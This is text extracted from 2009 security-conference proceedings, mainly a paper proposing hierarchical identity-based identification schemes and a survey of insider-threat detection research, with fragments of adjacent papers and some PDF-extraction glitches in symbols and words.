References 1. Ni, S.-Y., Tseng, Y.-C., Chen, Y.-S., Sheu, J.-P.: The broadcast storm problem in mobile ad hoc networks. In: Proc. ACM MobiCom 1999, Seatle, USA (August 1999) 2. Williams, B., Camp, T.: Comparison of Broadcasting Techniques for Mobile Ad Hoc Networks. In: ACM MOBIHOC (2002) 3. Yoo, J., Gil, H.-r., Kim, C.-k.: INK: Implicit Neighbor Knowledge Routing in Ad Hoc Networks. IEEE, Los Alamitos (2003) 4. Osafune, T., Lin, L., Lenardi, M.: Multi-Hop Vehicular Broadcast (MHVB). In: 6th Intermational Coference on ITS Teleconuiiic&ations (2006) 5. Kosch, T., Adler, C.J., Eichler, S., Schroth, C., Strassberger, M.: The scalability problem of vehicular ad hoc networks and how to solve it. IEEE Wireless Communications (October 2006) 6. Rahim, A., Yasin, M., Ahmad, I., Khan, Z.S., Sher, M.: Relevance Based Approach with Virtual Queue Using 802.11e protocol for Vehicular Adhoc Networks. In: 2nd International conference on Computer, Control and Communication, Karachi, February 14 (2009) 7. Eichler, S., Schroth, C., Kosch, T., Strassberger, M.: Strategies for context-adaptive message dissemination in vehicular ad hoc networks. In: e Second International Workshop on Vehicle-to-Vehicle Communications (July 2006) 8. Schroth, C., Eigner, R., Eichler, S., Strassberger, M.: A Framework for Network Utility Maximization in VANETs. In: International Conference on Mobile Computing and Networking, USA, September 29. ACM, New York (2006) 9. Adler, C., Eichler, S., Kosch, T., Schroth, C., Strassberger, M.: Self-organized and Context-Adaptive Information Diffusion in Vehicular Ad Hoc Networks. In: 3rd International Symposium on Wireless Communication Systems, ISWCS 2006 (2006) 10. NetworkSimulator, ns2, http://www.isi.edu/nsnam/ns 11. Baumann, R., Legendre, F., Sommer, P.: Generic Mobility Simulation Framework (GMSF). In: MobilityModels 2008, Hong Kong SAR, China, May 26. ACM, New York (2008)

Hierarchical Identity-Based Identification Schemes Ji-Jian Chin1 , Swee-Huay Heng2 , and Bok-Min Goi3 1

Research Group for Cryptography and Information Security (RGCIS), Faculty of Engineering, Multimedia University, Cyberjaya, 63000 Selangor, Malaysia [email protected] 2 Research Group for Cryptography and Information Security (RGCIS), Faculty of Information Science and Technology, Multimedia University, Jalan Ayer Keroh Lama, 75450 Melaka, Malaysia [email protected] 3 Faculty of Engineering and Science, Universiti Tunku Abdul Rahman, Kuala Lumpur Campus Malaysia [email protected]

Abstract. Hierarchical identity-based cryptography was introduced with the purpose of reducing the burden of a single Private Key Generator (PKG) and to limit damage to only domains whose lower-level PKGs are compromised. However, until now only security models and concrete schemes for hierarchical identity-based encryption and signature schemes are found in literature. In this paper, we propose the initial idea for hierarchical identity-based identification (HIBI) schemes. We provide the formal definition and security model for HIBI schemes and then proceed to propose a concrete HIBI scheme secure against passive attacks in the random oracle model under the Computational Diffie-Hellman assumption. We also prove the HIBI scheme secure against active and concurrent attacks in the random oracle model under the One-More Computational Diffie-Hellman assumption. Keywords: Hierarchical, Identity-based, Identification Scheme, Random Oracle Model.

1 1.1

Introduction Background

Identity-based (ID-based) cryptography began with Shamir’s initial paper [15] in 1984. Using a user’s identity string, one could eliminate the need for public key certificates. However, only recently were schemes developed by Boneh and Franklin [4] and Waters [16] that were practical and provable secure. In [9], Horwitz and Lynn presented the idea for hierarchical ID-based cryptography. They proposed a two-level hierarchical ID-based encryption (HIBE) scheme with total collusion resistance at the upper level and partial collusion resistance at the lower level, proving it secure under the Bilinear Diffie-Hellman ´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 93–99, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

94

J.-J. Chin, S.-H. Heng, and B.-M. Goi

(BDH) assumption in the random oracle model. Shortly after, Gentry and Silverberg followed with a HIBE scheme in [8] that is practical, fully scalable with total collusion resistance and chosen ciphertext secure in the random oracle model assuming the difficulty of the BDH problem based on the Boneh-Franklin ID-based Encryption (IBE) scheme.The same authors also proposed a Hierarchical ID-based Signature (HIBS) scheme using the same constructs. In [18], Yao et al. modified the Gentry-Silverberg HIBE to include the forward-secure property proposed by Canetti, Halevi and Katz in [7]. Recently HIBE schemes secure in the standard model were proposed by [5,6,14]. An identification scheme allows one party (the prover) to prove to another party (the verifier) of the authenticity of his or her identity without revealing any information about the prover’s secret. ID-based identification (IBI) schemes, where users did not need to use certificates but identity strings instead, were first formalized in [1] and [10] independently. Proofs of security of the IBI schemes in these two papers were provided in the random oracle model. A random oracle produces a bit-string of infinite length that can be truncated to a desired length. It is used in cryptographic proofs when there are no practical functions that provide sufficient mathematical properties to satisfy the proof of security [3]. IBI schemes secure in the standard model were later proposed in [11,12,13]. A general framework for IBI construction was also proposed in [17]. 1.2

Our Contribution

In this paper, we combine the idea of hierarchical ID-based cryptography with standard identification schemes, proposing the idea of hierarchical ID-based identification (HIBI) schemes. We formalize the definition and security model for HIBI schemes and then proceed to provide a concrete HIBI scheme based on the Gentry-Silverberg HIBE scheme and prove the proposed HIBI scheme secure in the random oracle model against passive attacks based on the intractability of the Computational Diffie-Hellman problem. We then prove the HIBI scheme secure in the random oracle model against active and concurrent attacks based on the intractability of the One-More Computational Diffie-Hellman problem. 1.3

Why HIBI?

The need for HIBI schemes is similar to the motivations put forth by Gentry and Silverberg for HIBE schemes [8]. HIBI would be able to take off the burden on a single Private Key Generator (PKG) in the environment of a large network of users. HIBI allows the root PKG to delegate key generation and identity authentication responsibilities to lower level PKGs. This also eases the private key distribution problem and improves scalability of conventional IBI schemes. In HIBI, damage is also restricted to the domain of the compromise. Compromise of a domain PKG’s secret will only affect it’s local nodes. Higher-level PKGs will not be affected. HIBI schemes would be naturally applicable to most organizations as most organizations have hierarchies. Some other applications for HIBI schemes would be to create temporary session keys by a single user that would not affect other

Hierarchical Identity-Based Identification Schemes

95

users in the system which are peers to him or her even if his or her private keys are compromised. The certificate-free nature of HIBI makes it even more appealing as one does not need to worry about processing, management or distribution of certificates as the level of hierarchies grow. Section 2 gives the preliminaries and notations used throughout this paper. We describe the formal definition and security model of HIBI schemes in Section 3, and then present our scheme in Section 4. We provide the security and efficiency analysis in Section 5 and conclude in Section 6.

2

Preliminaries

Let k denote the security parameter. We say that ε(k) is negligible if ε(k) approaches zero faster than k1c for any constant c > 0. 2.1

Bilinear Pairings

Let G and GT be finite cyclic groups of prime order q and let g be a generator of G. The map e : G × G → GT is said to be an admissible map if it satisfies the following three conditions: 1. Bilinearity. e(g a , g b ) = e(g, g)ab for all a, b ∈ Zq . 2. Non-degeneracy. e(g, g) = 1. 3. Efficiently computable. 2.2

Computational Diffie-Hellman Problem (CDHP)

Let G be a multiplicative cyclic group generated by g with prime order q. The CDHP is described as follows: Given (g, g a , g b ), calculate g ab . We say that the CDHP is (t, ε)-hard in G if Pr[A solves CDHP] ≤ ε for any A that runs in time t. 2.3

One-More Computational Diffie-Hellman Problem (OMCDHP)

The intractability of the One-More problems was first introduced in the area of identification schemes in [2] to prove the security of the GQ and Schnorr identification schemes. The OMCDHP was first used in the area of IBI to prove pairing-based IBI schemes secure against active and concurrent attacks in the random oracle model in [10] and [1]. The definition for the OMCDHP follows as in [1].

3

Hierarchical Identity-Based Identification

We define a user’s position in the hierarchy by its tuple of IDs:(ID1 , ..., IDl ) where the root PKG is ID0 and the user’s parent identity tuples are ID1 , ..., IDi : 1 ≤ i < l.

96

3.1

J.-J. Chin, S.-H. Heng, and B.-M. Goi

Definition

A HIBI scheme is defined by five probabilistic polynomial-time algorithms: 1. Root Setup(RS ). RS takes in a security parameter k and returns the system parameters params and a root level master secret rlmsk. It publishes params, which includes a description of G and GT , while rlmsk is kept secret. 2. Lower-Level Setup(LLS ). Lower-level PKGs get the description of G and GT from params and generate a domain-level secret dlmsk. 3. Extract(E ). RS with ID-tuple ID0 and/or LLS with ID-tuple (ID1 , ..., IDl ) runs (E on input params and rlmsk for root level PKGs or dlmsk for lower-level PKGs and generates a public -value and corresponding user secret key usk for its children with ID-tuple (ID1 , ..., IDl+1 ). 4. Identification Protocol. When a user wants to prove itself, it runs Prove(P) by taking in params and usk and interacts with the verifier’s Verify(V ) algorithm in a canonical 3-step protocol as follows: (a) Commitment. P sends a commitment CM T to V. (b) Challenge. V sends a challenge CHA from a predefined set. (c) Response. P returns a response RST where V will either accept or reject. 3.2

Security Model

For HIBI, impersonation remains the main adversarial goal, where an impersonator succeeds in interacting with the verifier in the role of a prover with ID-tuplei without uski and succeeds in convincing the verifier to accept. The adversaries of HIBI would be similar to conventional IBI. The passive attacker eavesdrops on conversations between an honest prover and verifier.The active/concurrent attacker interacts with honest provers as a cheating verifier before impersonation with the concurrent attacker able to interact with multiple provers at once. We describe the security of a HIBI scheme with the following game between an impersonator I and a challenger. In Setup, the challenger first takes in a security parameter k, gives the resulting params to the I and keeps rlmsk to itself. In phase 1, I can issue queries q1 , ..., qm where qi can be a private key query or identification query. For private key queries, upon being queried with the public key of ID-tuplei , the challenger runs E and returns uski to I. For identification queries, the challenger responds with a transcript for the interaction between prover and verifier for passive I or acts as the prover while I takes the role of a cheating verifier for active/concurrent I. In challenge phase, I outputs an ID-tuple*∈{ID-tuple / i } that it wishes to impersonate. In phase 2 I can continue to query the private keys of ID-tuplei as long as ID-tuplei is not an ancestor of ID-tuple* or ID-tuplei =ID-tuple*. I can also continue to query for either transcripts for passive I or identification interactions for active/concurrent I for ID-tuple* or any ancestor of ID-tuple*. Finally in the impersonation phase, I plays the cheating prover to convince the verifier and wins if successful with non-negligible probability.

Hierarchical Identity-Based Identification Schemes

97

We say an IBI scheme is (t, qE , ε) -secure under passive (imp-pa) or active/concurrent (imp-aa/ca) attacks if for any passive or active/concurrent impersonator I who runs in time t , Pr[I can impersonate] < ε , where I can make at most qE extract queries.

4

Construction

In this section, we propose our concrete, efficient and provable secure HIBI scheme. Our scheme naturally expands the hierarchy of the single-tier IBI scheme proposed in [10] using modification techniques from [8]. Let Leveli denote the set of entities at level i with Level0 = {RootP KG}. Let G and GT be finite multiplicative cyclic groups of large prime order p and let e : G × G → GT be an efficiently computable bilinear map. Let H : {0, 1}∗ → G be a hash function that hashes an arbitrary bit string into an element in G. H is treated as a random oracle in the security analysis. 1. Root Setup: Select a random generator g0 ∈ G and a secret s0 ∈ Zq . Sets 0 = g0s0 and publishes params = (G, GT , e, H, g0 , 0 ) while keeping s0 secret. 2. Lower-Level Setup: Entity IDl picks a random sl ∈ Zq and keeps it secret. 3. Extract: For an entity IDl in Levell with ID-tuple (ID1 , ..., IDl ), where (ID1 , ..., IDi ) for 1 ≤ i ≤ l corresponds to IDl ’s ancestor at Leveli , IDl ’s parent IDl−1 will run Extract by s (a) computing gl = H(ID1 , ..., IDl ) and l−1 = g0l−1 sl−1 (b) calculating IDl ’s usk to be Sl = Sl−1 × gl and (c) giving IDl (g, ) where g = {g1 , ..., gl } and  = {0 , ..., l−1 } and usk = (Sl ). 4. Identification Protocol: For an entity IDl with ID-tuple (ID1 , ..., IDl ) trying to prove itself to a verifier, (a) Prover takes in input (g, ,Sl ), generates a random r ∈ Zp , computes X = {X1 , ..., Xl } = {g1r , ..., glr } and sends X to Verifier. (b) Verifier picks a random challenge c ∈ Zp and sends to Prover. (c) Prover calculates Z = (Sl )r+c and sends Z as a response to Verifier. l (d) Verifier accepts if e(g0 , Z) = i=1 e(i−1 , (Xi )(gi )c )

5 5.1

Security Analysis Security against Passive Attacks

Theorem 1. If the CDH problem is (t , ε )-hard, then the HIBI scheme is (t, qE , ε)-secure against passive attacks, where  t = O(t), ε ≤ ε ( e(qEli+l) )l + 1q

98

5.2

J.-J. Chin, S.-H. Heng, and B.-M. Goi

Security against Active and Concurrent Attacks

Theorem 2. If the OMCDH problem is (t , qCDH , ε )-hard, then the HIBI scheme is (t, qE , ε)-secure against active and concurrent attacks, where  t = O(t), ε ≤ ε ( e(qEli+l) )l + 1q The detailed proof of Theorems 1 and 2 can be found in the full paper. 5.3

Efficiency Analysis

Our scheme has a private key size of 1 group element. The public key and parameters consist of the description of the groups G, GT , the pairing e and a hash to G. Table 1. Complexity cost for each algorithm in the proposed HIBI scheme

Setup Extract Prove Verify

Hashing 0 1 l l

Multiplication 0 1 0 l

Exponentiation 1 1 l +1 l

Pairing 0 0 0 l +1

We provide the complexity costs for each algorithm in Table 1. Efficiency can be improved using the similar concept of the Dual method proposed in [8] for Dual-Identity-Based Encryption and Dual-Identity-Based-Signatures.

6

Conclusion

We proposed the formal definition and security model for HIBI schemes. We also constructed a concrete and efficient HIBI scheme that is imp-pa secure based on the intractability of the CDHP and imp-aa/ca secure based on the intractability of the OMCDHP in the random oracle model.

References 1. Bellare, M., Namprempre, C., Neven, G.: Security proofs for identity-based identification and signature schemes. In: Cachin, C., Camenisch, J.L. (eds.) EUROCRYPT 2004. LNCS, vol. 3027, pp. 268–286. Springer, Heidelberg (2004) 2. Bellare, M., Palacio, A.: GQ and Schnorr identification schemes: proofs of security against impersonation under active and concurrent attacks. In: Yung, M. (ed.) CRYPTO 2002. LNCS, vol. 2442, pp. 162–177. Springer, Heidelberg (2002) 3. Bellare, M., Rogaway, P.: Random oracles are practical: a paradigm for designing efficient protocols. In: 1st ACM Conference on Computer and Communications Security, pp. 62–73. ACM Press, New York (1993)

Hierarchical Identity-Based Identification Schemes

99

4. Boneh, D., Franklin, M.: Identity-based encryption from the Weil pairing. In: Kilian, J. (ed.) CRYPTO 2001. LNCS, vol. 2139, pp. 213–229. Springer, Heidelberg (2001) 5. Boneh, D., Boyen, X., Goh, E.-J.: Hierarchical identity-based encryption with constant size ciphertext. In: Cramer, R. (ed.) EUROCRYPT 2005. LNCS, vol. 3494, pp. 440–456. Springer, Heidelberg (2005) 6. Boyen, X., Waters, B.: Anonymous hierarchical identity-based encryption without random oracles. In: Dwork, C. (ed.) CRYPTO 2006. LNCS, vol. 4117, pp. 290–307. Springer, Heidelberg (2006) 7. Canetti, R., Halevi, S., Katz, J.: A forward-secure public-key encryption scheme. In: Biham, E. (ed.) EUROCRYPT 2003. LNCS, vol. 2656, pp. 255–271. Springer, Heidelberg (2003) 8. Gentry, C., Silverberg, A.: Hierarchical ID-based cryptography. In: Zheng, Y. (ed.) ASIACRYPT 2002. LNCS, vol. 2501, pp. 548–566. Springer, Heidelberg (2002) 9. Horwitz, J., Lynn, B.: Towards hierarchical identity-based encryption. In: Knudsen, L.R. (ed.) EUROCRYPT 2002. LNCS, vol. 2332, pp. 466–481. Springer, Heidelberg (2002) 10. Kurosawa, K., Heng, S.-H.: From digital signature to ID-based identification/signature. In: Bao, F., Deng, R., Zhou, J. (eds.) PKC 2004. LNCS, vol. 2947, pp. 248–261. Springer, Heidelberg (2004) 11. Kurosawa, K., Heng, S.-H.: Identity-based identification without random oracles. In: Gervasi, O., Gavrilova, M.L., Kumar, V., Lagan´a, A., Lee, H.P., Mun, Y., Taniar, D., Tan, C.J.K. (eds.) ICCSA 2005. LNCS, vol. 3481, pp. 603–613. Springer, Heidelberg (2005) 12. Kurosawa, K., Heng, S.-H.: The power of identification schemes. In: Yung, M., Dodis, Y., Kiayias, A., Malkin, T.G. (eds.) PKC 2006. LNCS, vol. 3958, pp. 364– 377. Springer, Heidelberg (2006) 13. Kurosawa, K., Heng, S.-H.: The power of identification schemes. International Journal of Applied Cryptography 1(1), 60–69 (2008) 14. Sarkar, P., Chatterjee, S.: Trading time for space: Towards an efficient IBE scheme with short(er) public parameters in the standard model. In: Won, D.H., Kim, S. (eds.) ICISC 2005. LNCS, vol. 3935, pp. 424–440. Springer, Heidelberg (2006) 15. Shamir, A.: Identity-based cryptosystems and signature schemes. In: Blakely, G.R., Chaum, D. (eds.) CRYPTO 1984. LNCS, vol. 196, pp. 47–53. Springer, Heidelberg (1985) 16. Waters, B.: Efficient identity-based encryption without random oracles. In: Cramer, R. (ed.) EUROCRYPT 2005. LNCS, vol. 3494, pp. 114–127. Springer, Heidelberg (2005) 17. Yang, G., Chen, J., Wong, D.S., Deng, X., Wang, D.: A more natural way to construct ID-based identification schemes. In: Katz, J., Yung, M. (eds.) ACNS 2007. LNCS, vol. 4521, pp. 307–322. Springer, Heidelberg (2007) 18. Yao, D., Fazio, N., Dodis, Y., Lysyanskaya, A.: ID-based encryption for complex hierarchies with applications to forward security and broadcast encryption. In: ACM Conference on Computer and Communications Security - CCS 2004, pp. 354–363. ACM Press, New York (2004)

The Trend of the Security Research for the Insider Cyber Threat Jaeseung Hong, Jongwung Kim, and Jeonghun Cho School of Electrical Engineering and Computer Science, Kyungpook National University 1370, Sangyuk-dong, Buk-gu, Daegu, Korea {psman2, brewer, jcho}@ee.knu.ac.kr

Abstract. In this paper, we discuss an insider security which has been one of the biggest issues in the network security. By surveying and analyzing an issue of previous studies, we suggest an effective approach for future research. Approximately 90% of the information leakage incidents are recently being performed by internal workers. It is coming as a more serious problem than outsider attacks. The information leakage incident makes an organization or a company not only loses information but also gives a hard blow to the image. To prevent economic loss and damage to the image in advance, we need various research and development for effective solution. Keywords: insider threat, insider security, malicious intent.

1 Introduction Until recently, the cyber security considers just external attacks for protecting inside resource. Firewall, IDS/IPS, VPN and antivirus are used as a protection device for the system and the network from Cracking, viruses or worm. However, such as the core technology leakage, customer information leakage or embezzlement is frequently performed by most of the insiders at companies and financial institutions. According to the Small Business Administration in Korea, 90% of the information leakage incidents are made by internal staff. Because the damage is getting serious with the information leakage incident, insider security study has become one of the big issues in the network security. Internal workers have access rights to various inside resources for those own business. They have a lot of knowledge about system of an organization. Therefore, they know where resource or information they want is and how to access them. If they want, they can avoid security system to obtain the desired resource and information. It is possible to give serious damage to an organization, if these insiders have a malicious intent. Although a research for the insider security is actively in progress by the academic world and a company’s laboratory, it is difficult to solve every problem with one solution because of a feature of the insider security. In this paper, by analyzing and surveying the results of recent research for the insider security in the academic, we identify the problems of existing research to present an effective approach for the future insider security research. D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 100–107, 2009. © Springer-Verlag Berlin Heidelberg 2009

The Trend of the Security Research for the Insider Cyber Threat

101

2 The Insider Security In modern society, most of the employees essentially use a computer for their own business. They have access to use internal resources of an organization through computer networks, and any time they can access to necessary internal resources. Likewise, we call a direct or an indirect member of the organization the insider, who has access right to access to internal resources. The insider accesses everyday internal resources for their work using a computer. Like this, information of organizations is stored and passed to a server through a computer network. An organization and a large corporation have invested a lot of money and effort to defend external attacks, which are for the purpose of seizing important information or destroying simply a system. They have used various solutions from a basic firewall to an intelligent defense system, such as IDS/IPS, for actively dealing with external attacks. Because defense technology becomes more improved by more intelligent outside attacks, today we have had a significant defense solution against outside attacks. According to Computer Crime and Security Survey[1,2,3,4] announced by CSI/FBI in the United States, the damage by outsider attacks has decreased continuously since 2001 years. However, the damage by an insider threat has increased relatively, although external attacks have decreased at total damage. The occurrence of external via a network attacks is higher than an insider threat. Therefore, until now the focus of network security is defense from external attacks. However, according to a survey of CSI/FBI [1], computer security incidents by the insider occupy 15.37% in Table 1. This percentage is a higher loss for occurrence rate. The security incidents by the insider are not high occurrence probability, but if a security incident occurs, it is fatal damage to the organization and difficult to analyze and cope to the cause. Recently, a company and an organization do many investments for preventing a secret outflow by the insider, but it has still many problems. The insiders have a lot of knowledge about the system structure of an organization and know well where resource they want is. If the insiders have a malicious purpose to obtain organization’s resource, it is possible to gain the information using their knowledge for avoiding the security system. All of the employee’s behavior could be Table 1. Annual losses from CSI/FBI surveys Insider Threat Year

Total loss lost

Percentage

2001

377,828,700

41,065,650

10.86 %

2002

455,848,000

54,602,000

11.98 %

2003

201,797,340

12,173,500

6.03 %

2004

144,496,560

14,879,260

10.30 %

2005

130,104,542

38,089,550

29.28 %

2006

52,494,290

12,466,810

23.74 %

102

J. Hong, J. Kim, and J. Cho

controlled by a strong security policy for internal security, but it is able to significantly make loss of work efficiency. When the insiders have a malicious purpose, they show some of the visible signs that they try to access the unauthorized resources or store necessary information to personal database. In this paper, we analyze various modeling techniques about the insider’s behavioral patterns, and then we present how to prevent and detect the potential insider threat effectively.

3 The Previous Researches for the Insider Threat Through the result of existing studies, we will discuss the significance issue of the insider security and some of the problems, which are showed during developing an insider security system. 3.1 Prediction Model For predicting the insider threat, Hui Wang, Shufen Liu and Xinjia Zhang proposed an approach using a tree structure at [9]. In this paper, the authors referred to the attack tree of Bruce Schneier [10] for their own approach. The Attack tree is able to be used for detecting various internal or external attacks. They introduced the System Attack Tree in a new way, which was more improved than the Attack tree. The System Attack Tree configures a tree after collecting all of the attack paths in a system, and detects the insider threat.

Fig. 1. The framework of insider threat model

The insider gives information to a system regarding a purpose of using before entering. By given, information the Signature Powered Revised Instruction Table, denoted by SPRINT, is configured, and the system makes Aos, which is a set of intended operations according to the insider’s SPRINT plan. Finally, based on the Minimal Attack Tree generated by Aos, the security system observes an actual user action to detect a malicious intent. The overall configuration is shown below.

The Trend of the Security Research for the Insider Cyber Threat

103

Fig. 2. Flow diagram for insider threat model

As shown in Figure 1, when the insider is connected to a system, the Interactive Agent requests some information regarding a purpose of using, and then the user has to wait for a while. After configuring Aos with given information, the Central Agent makes the Minimal Attack Tree by comparing Aos with the System Attack Tree. In this phase, the insider can work and the Predicting Agent observes a user’s behavior by the Minimal Attack Tree to detect an attack possibility. If detecting a malicious intention, the Predicting Agent halts the insider’s behavior. 3.2 Intent-Driven Insider Threat Detection Santos E., Hien Nquyen and Fei Yo propose an intent-driven framework, which consists of a user model and insider detection metrics, to automatically detect the insider threats at [11]. Many traditional studies of the insider threat have focused an action-based, a social network, and a document-based, however the authors talked about grasping the intent of the user. When users access the internal resources, they will have intentions, which are malicious or not. If some insiders have a malicious intent, it shows some of the features as the follows [11]: they may use many non-supporting queries or put more constraints on non-supporting queries, when the insiders search for information; they may neglect non-supporting documents, use old documents when supporting documents are not enough, or even fabricate pieces of information; when drawing reports, the insider may quote the same documents, and overstate record information. Through the experiments and the analysis, malicious intents can be classified by grasping the insider’s intents. In this paper, the user models are based on the IPC model [12, 13] which includes an interest list, a preference network and a context network. Especially, a context network is important one. It is a document graph (DG), which is used to model a user’s knowledge context. A DG is generated for each document from the textual deliverables. A DG consists of concept nodes and relations between them. Two sort of relations are defined by the “Is a” relation and the “Related to” relation as shown in Figure 3. Users’ context networks are tracked and analyzed by detection metrics. A similarity

104

J. Hong, J. Kim, and J. Cho

Fig. 3. An example of a Document Graph

value between a document viewed by the analyst and their context network can be computed by the following equation [14]. n m (1) Similarity DG , DG 2N 2M In the equation, n denotes the number of concept nodes shared by DG1 and DG2. N denotes the total number of concept nodes in DG1. Likewise, m and M are parallel to n and N except they count the relation nodes instead of the concept nodes. 3.3 Sensitive Information Dissemination Detection The Sensitive Information Dissemination Detection was proposed by Yali Liu, Cherita Corbett and Rennie Archibald, Biswanath at [15]. This study uses network traffic to detect the insider threat. It is similar to a traditional method, which compares traffic statistics at each hour. When someone accesses specific internal data, its patterns are analyzed. As the following figure 4, it can image one of the scenarios: A company X outsources its customer service to another company Y by establishing a shared (enterprise) network connecting their corporate LANs. In the service process, X needs to provide proprietary documents and manuals to Y, but it does not wish to share some sensitive/proprietary information. A malicious insider Z seeks to create backdoor networks to enable loss or damage of protected information and exfiltrate sensitive/proprietary information using the enterprise’s network resources. To detect and prevent the leakage of sensitive information, SIDD is placed at the network egress to monitor the traffic flow outbound from the protected network. First step, the captured network traffic is filtered into the application identification system to extract traffic features. And second step, after the traffic flow passes through the application identification checking process, it will pass into the Content Retrieval process and the content of application will be analyzed by the content detection stage. In this final step, SIDD may only be able to detect the presence of hidden content and not fully recover the content for comparison. When the internal network traffic passes through, SIDD parses the flow and waits for the server response. It may perform up to three-phase checks in a response time to determine how to filter outgoing traffic to prevent exfiltration of sensitive information.

The Tren nd of the Security Research for the Insider Cyber Threat

105

Fig. 4. A motivatin ng example for sensitive data exfiltration and detection

3.4 Honeypot The honeypot is able to not n only detect a malicious external attack and luree an attacker for intercept but also a to analyze attacker’s patterns for corresponding nnew attack techniques. We lure an outside attacker to a vulnerable system to security, and ues, tools, and behavioral patterns so on. The hoenypot w was collect their attack techniqu originally developed for defending d external attacks, but Lance Spitzner showeed a detection technique with thee hoenypot for the insider threat at [8]. Middle of 1990’s, Daviid Clock first proposed the honeypot. When an exterrnal attack occurs, by attracting this attack to the honeypot, we can intercept the attack and collect information, which is the attacker’s behavioral patterns, techniques and toools. Especially, when IDS and IPS are powerless in the zone day, the honeypot colllect d new attack techniques, and protect an internal system. attacker’s information and Lance Spitzner moved the honeypot, which was developed for protecting the systtem t system for detecting the insider threat. The insider w with form external attacks, into the malicious intent might be interested i in ID, password, confidential information orr so on. So, Honeytoken [8] is configured by documents or e-mail, which includes llike a placed into the system. All of the insiders have the confidential information, and access right to approach Honeytoken, H however that is not true. If someone accessses Hoenytoken, we need to suspect that person’s malicious intent. Also, Hoenytoken can gine for observing the insider threat. If the insider searcches be placed into a search eng specific confidential inform mation in the organization’s intranet, the search enggine shows Hoenytoken link to the t insider. Because the insider has the access right for the intranet, a search does nott cause the insider threat. However, clicking Hoenytooken link is that the insider is in nterested in the confidential information. It is possiblee to make the insider threat.

4 Problems of the Current C Insider Security System Now a lot of research is still in progress, and many insider security solutions hhave he research. However, the result of the insider secuurity been released based of th solution is still not as satisfactory as external security solution. The biggest probllem ution for development is that the insider has a lot of the of the insider security solu information about the organ nization, and understands the organization’s structure. T The

106

J. Hong, J. Kim, and J. Cho

insider not only knows where desired information is but also has sufficient knowledge about internal security system. If one of the insiders has a malicious intent to take confidential information, it is not difficult. It is very difficult to protect internal resource from the malicious insider using any excellent algorism and technique. Especially, it is actually impossible to prevent the insider security incidents by a system manager. Because the system managers manage all of the systems as well as the insider security system, if they have a malicious intent, it is the biggest insider threat.

5 Conclusions To prevent the insider threat, we need a security system, which not only simply protects internal resources but also have to grasp the insider’s behavioral patterns or intents in advance. Also, if the insider security incident happens, the security system has to grasp a cause and track the attacker deficiently. For preventing the insider threat by the system manager, management domains and permissions of the system manager have to be divided according to related work, and business has to have interdependence between each works to prevent that one person has a lot of the permission. A malicious insider becomes more intelligent because of improving an insider security system. We have to think why the insider threat happens. If the malicious insider is just not a spy, he/she is a person, who is discontented with various reasons. Sometimes, the insiders have dissatisfaction because of employment, wages, promotion and so on. The more these dissatisfaction grow bigger, the more the insider will have malicious intents by compensatory mentality. Establishing a powerful insider security system is important, however through appropriate evaluation and compensation system according to business ability, forming mutual trust relationship between the insider and the organization to lower the possibility of the insider threat is also important.

Acknowledgements This research was supported by the MKE(The Ministry of Knowledge Economy), Korea, under the ITRC(Information Technology Research Center) Support program supervised by the NIPA(National IT industry Promotion Agency) (NIPA-2009C1090-0902-0020).

References 1. Richardson, R.: 2003 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2003) 2. Gordon, L.A., Loeb, M.P., Lucyshyn, W., Richardson, R.: 2004 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2004) 3. Gordon, L.A., Loeb, M.P., Lucyshyn, W., Richardson, R.: 2005 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2005)

The Trend of the Security Research for the Insider Cyber Threat

107

4. Gordon, L.A., Loeb, M.P., Lucyshyn, W., Richardson, R.: 2006 CSI/FBI Computer Crime and Security Survey. Computer Security Institute (2006) 5. Althebyan, Q., Panda, B.: A Knowledge-Base Model for Insider Threat Prediction. In: Proceedings of the 2007 IEEE Workshop on Information Assurance. United States Military Academy, West Point (2007) 6. Althebyan, Q., Panda, B.: A Knowledge-Based Bayesian Model for Analyzing a System after an Insider Attack. To Appear in the IFIP 23rd International Information Security Conference, Milan, Italy (September 2008) 7. Althebyan, Q., Panda, B.: Performance analysis of an insider threat mitigation model. In: ICDIM 2008, pp. 703–709 (2008) 8. Spitzner, L.: Honeypots: Catching the Insider Threat. In: 19th Annual Computer Security Applications Conference, ACSAC 2003 (2003) 9. Wang, H., Liu, S., Zhang, i.: A Prediction Model of Insider Threat Based on Multi-agent. In: 2006 1st International Symposium on Pervasive Computing and Applications (2006) 10. Schneier, B.: Attack trees: Modeling security threats. Dr. Dobb’s Journal (December 1999) 11. Santos Jr., E., Nguyen, H., Yu, F., Kim, K., Li, D., Wilkinson, J.T., Olson, A., Jacob, R.: Intent-driven Insider Threat Detection in Intelligence Analyses. In: 2008 IEEE/WIC/ACM International Conference on Web Intelligence and Intelligent Agent Technology (2008) 12. Nguyen, H., Santos Jr., E., Zhao, Q., Wang, H.: Capturing User Intent for Information Retrieval. In: Proceedings of the 48th Annual Meeting for the Human Factors and Ergonomics Society (HFES 2004), New Orleans, LA, pp. 371–375 (2004b) 13. Santos Jr., E., Nguyen, H., Zhao, Q., Wang, H.: User modelling for intent prediction in information analysis. In: Proceedings of the 47th Annual Meeting for the Human Factors and Ergonomincs Society, pp. 1034–1038 (2003a) 14. Montes-y-Gómez, M., Gelbukh, A., Lópes-López, A.: Comparison of Conceptual Graphs. In: Cairó, O., Cantú, F.J. (eds.) MICAI 2000. LNCS, vol. 1793. Springer, Heidelberg (2000) 15. Liu, Y., Corbett, C., Archibald, R., Biswanath: SIDD: A Framework for Detecting Sensitive Data Exfiltration by an Insider Attack. In: Proceedings of the 42nd Hawaii International Conference on System Sciences (2009)

MIMO Wiretap Channel: A Scalar Approach Mohammad Rakibul Islam and Jinsang Kim Dept. of Electronics and Radio Engineering Kyung Hee University 1 Seocheon, Kihung, Yongin, Gyeonggi, 449-701, Korea [email protected]

